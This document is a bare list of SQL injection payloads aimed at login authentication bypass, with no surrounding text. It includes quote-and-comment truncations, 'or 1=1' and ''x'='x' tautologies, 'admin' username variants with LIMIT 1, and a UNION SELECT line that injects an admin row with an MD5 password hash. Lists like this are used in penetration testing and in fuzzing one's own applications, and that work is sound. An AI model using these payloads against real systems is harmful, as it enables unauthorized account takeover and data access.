' --
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
1141' and 'els'='els
1141' and 'els'='elsec
1141' and 'hello'='hello
1141' and 'hello'='bye
els' or '1'='1
els' or '1'='2
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
root' or 1=1 LIMIT 1;#
admin' or '1'='1 LIMIT 1
admin' or '1'='1' LIMIT 1--
admin' or '1'='1' LIMIT 1#
admin' or '1'='1' LIMIT 1/*
admin'or 1=1 or ''='
admin' or 1=1 LIMIT 1
admin' or 1=1 LIMIT 1--
admin' or 1=1 LIMIT 1#
admin' or 1=1 LIMIT 1/*
admin') or ('1'='1 LIMIT 1
admin') or ('1'='1' LIMIT 1--
admin') or ('1'='1' LIMIT 1#
admin') or ('1'='1' LIMIT 1/*
admin') or '1'='1 LIMIT 1
admin') or '1'='1' LIMIT 1--
admin') or '1'='1' LIMIT 1#
admin') or '1'='1' LIMIT 1/*
admin" LIMIT 1--
admin" LIMIT 1#
admin" LIMIT 1/*
admin" or "1"="1 LIMIT 1
admin" or "1"="1" LIMIT 1--
admin" or "1"="1" LIMIT 1#
admin" or "1"="1" LIMIT 1/*
admin" or 1=1 LIMIT 1
admin" or 1=1 LIMIT 1--
admin" or 1=1 LIMIT 1#
admin" or 1=1 LIMIT 1/*
admin") or ("1"="1 LIMIT 1
admin") or ("1"="1" LIMIT 1--
admin") or ("1"="1" LIMIT 1#
admin") or ("1"="1" LIMIT 1/*
admin") or "1"="1 LIMIT 1
admin") or "1"="1" LIMIT 1--
admin") or "1"="1" LIMIT 1#
admin") or "1"="1" LIMIT 1/*
